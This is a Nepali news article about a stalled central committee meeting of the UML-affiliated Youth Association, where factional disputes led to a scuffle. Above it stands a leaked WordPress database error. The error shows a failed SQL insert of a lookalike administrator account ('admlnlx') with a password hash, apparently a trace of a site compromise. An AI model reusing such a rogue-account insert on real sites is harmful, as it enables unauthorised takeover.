WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgGyE9MBr0Hn8YXkOryIe5Ghyh6RrT0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 17:54:38', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २६ –
संस्थापन पक्ष र माधव नेपाल पक्षबीचको विवादका कारण एमालेसम्वद्ध युवा संघको केन्द्रीय कमिटी बैठक चार दिनदेखि अवरुद्ध भएको छ । राजिव पहारी अध्यक्ष भएपछि पहिलो पटक करीव डेढ वर्षमा डाकिएको बैठक शुरुकै दिन हात हालाहाल भएपछि अवरुद्ध अवस्थामा छ ।
ललितपुरको च्यासलस्थित तुलसीलाल स्मृति प्रतिष्ठानको हलमा अध्यक्ष ओलीले उदघाटन गरेको बैठकमा माधव नेपाल पक्षले अन्तरजिल्ला कमिटीहरु भंग गर्न माग गरेपछि विवाद शुरु भएको थियो ।
नेपाल पक्षले पार्टीको नियमावलीले अनेरास्ववियु बाहेक कुनै पनि जनसंगठनमा सम्पर्क कमिटीहरु नरहने भनेकाले नियमावली विपरीतको अन्तरजिल्ला कमिटी भंग हुनुपर्ने अडान राखेको छ ।
अन्तरजिल्लाका इञ्चार्ज तथा युवा संघका केन्द्रीय सदस्य क्षितिज थेबेले बैठकमा रिपोर्टिङ गर्न थालेपछि बैठकको शुरुमै नेपाल पक्षले अवैध कमिटीको रिपोर्ट नसुन्ने भन्दै बैठक बहिस्कार गरेको स्रोतले जनाएको छ । त्यस क्रममा हात हालाहाल समेत भएको एक केन्द्रीय सदस्यले बताए ।
यसबीचमा अध्यक्ष पहारीले विवाद मिलाउन पटक-पटक स्थायी कमिटीको बैठक राखे पनि अझै टुंगो लागेको छैन । नेपाल पक्षधर युवा संघ उपाध्यक्ष दिलकुमारी पन्तले पार्टीको नियमावलीसँग बाझिएका कमिटी स्वतः भंग हुने भएकाले आफूहरुले नयाँ विवाद नझिकेको बताइन् । उनका अनुसार यो विषय शेरधन राई इञ्चार्ज भएकै समयमा टुंगिएको हो ।